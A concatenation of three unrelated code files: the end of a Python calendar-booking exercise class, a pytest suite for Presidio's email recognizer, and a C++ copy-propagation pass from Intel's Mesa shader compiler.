self.bookings = []
def book(self, start, end):
"""
:type start: int
:type end: int
:rtype: bool
"""
# self.bookings = sorted(self.bookings)
overlapCount = 0
for slot in self.bookings:
st, ed = slot
if st < start < ed or st <= end < ed:
overlapCount += 1
if overlapCount >= 3:
return False
else:
self.bookings.append([start, end])
return True
# Your MyCalendarTwo object will be instantiated and called as such:
# obj = MyCalendarTwo()
# param_1 = obj.book(start,end) | 327 |
1,408 | <gh_stars>1000+
import pytest
from tests import assert_result
from presidio_analyzer.predefined_recognizers import EmailRecognizer
@pytest.fixture(scope="module")
def recognizer():
return EmailRecognizer()
@pytest.fixture(scope="module")
def entities():
return ["EMAIL_ADDRESS"]
@pytest.mark.parametrize(
"text, expected_len, expected_positions",
[
# fmt: off
# valid email addresses
("<EMAIL>", 1, ((0, 18),),),
("my email address is <EMAIL>", 1, ((20, 38),),),
("try one of these emails: <EMAIL> or <EMAIL>",
2,
((25, 43), (47, 72),),),
# invalid email address
("my email is <EMAIL>@presidio.", 0, ()),
# fmt: on
],
)
def test_when_all_email_addresses_then_succeed(
text, expected_len, expected_positions, recognizer, entities, max_score
):
results = recognizer.analyze(text, entities)
assert len(results) == expected_len
for res, (st_pos, fn_pos) in zip(results, expected_positions):
assert_result(res, entities[0], st_pos, fn_pos, max_score)
| 450 |
2,151 | /*
* Copyright © 2012 Intel Corporation
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
* FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
* IN THE SOFTWARE.
*/
#include "brw_fs.h"
#include "brw_fs_cfg.h"
namespace { /* avoid conflict with opt_copy_propagation_elements */
struct acp_entry : public exec_node {
fs_reg dst;
fs_reg src;
};
}
bool
fs_visitor::try_copy_propagate(fs_inst *inst, int arg, acp_entry *entry)
{
if (inst->src[arg].file != entry->dst.file ||
inst->src[arg].reg != entry->dst.reg ||
inst->src[arg].reg_offset != entry->dst.reg_offset) {
return false;
}
/* See resolve_ud_negate() and comment in brw_fs_emit.cpp. */
if (inst->conditional_mod &&
inst->src[arg].type == BRW_REGISTER_TYPE_UD &&
entry->src.negate)
return false;
bool has_source_modifiers = entry->src.abs || entry->src.negate;
if (intel->gen == 6 && inst->is_math() &&
(has_source_modifiers || entry->src.file == UNIFORM))
return false;
inst->src[arg].file = entry->src.file;
inst->src[arg].reg = entry->src.reg;
inst->src[arg].reg_offset = entry->src.reg_offset;
if (!inst->src[arg].abs) {
inst->src[arg].abs = entry->src.abs;
inst->src[arg].negate ^= entry->src.negate;
}
return true;
}
/** @file brw_fs_copy_propagation.cpp
*
* Support for local copy propagation by walking the list of instructions
* and maintaining the ACP table of available copies for propagation.
*
* See Muchnik's Advanced Compiler Design and Implementation, section
* 12.5 (p356).
*/
/* Walks a basic block and does copy propagation on it using the acp
* list.
*/
bool
fs_visitor::opt_copy_propagate_local(void *mem_ctx,
fs_bblock *block, exec_list *acp)
{
bool progress = false;
for (fs_inst *inst = block->start;
inst != block->end->next;
inst = (fs_inst *)inst->next) {
/* Try propagating into this instruction. */
foreach_list(entry_node, acp) {
acp_entry *entry = (acp_entry *)entry_node;
for (int i = 0; i < 3; i++) {
if (try_copy_propagate(inst, i, entry))
progress = true;
}
}
/* kill the destination from the ACP */
if (inst->dst.file == GRF) {
foreach_list_safe(entry_node, acp) {
acp_entry *entry = (acp_entry *)entry_node;
if (inst->overwrites_reg(entry->dst) ||
inst->overwrites_reg(entry->src)) {
entry->remove();
}
}
}
/* If this instruction is a raw copy, add it to the ACP. */
if (inst->opcode == BRW_OPCODE_MOV &&
inst->dst.file == GRF &&
((inst->src[0].file == GRF &&
(inst->src[0].reg != inst->dst.reg ||
inst->src[0].reg_offset != inst->dst.reg_offset)) ||
inst->src[0].file == UNIFORM) &&
inst->src[0].type == inst->dst.type &&
!inst->saturate &&
!inst->predicated &&
!inst->force_uncompressed &&
!inst->force_sechalf &&
inst->src[0].smear == -1) {
acp_entry *entry = ralloc(mem_ctx, acp_entry);
entry->dst = inst->dst;
entry->src = inst->src[0];
acp->push_tail(entry);
}
}
return progress;
}
bool
fs_visitor::opt_copy_propagate()
{
bool progress = false;
void *mem_ctx = ralloc_context(this->mem_ctx);
fs_cfg cfg(this);
for (int b = 0; b < cfg.num_blocks; b++) {
fs_bblock *block = cfg.blocks[b];
exec_list acp;
progress = opt_copy_propagate_local(mem_ctx, block, &acp) || progress;
}
ralloc_free(mem_ctx);
if (progress)
live_intervals_valid = false;
return progress;
}
| 1,704 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.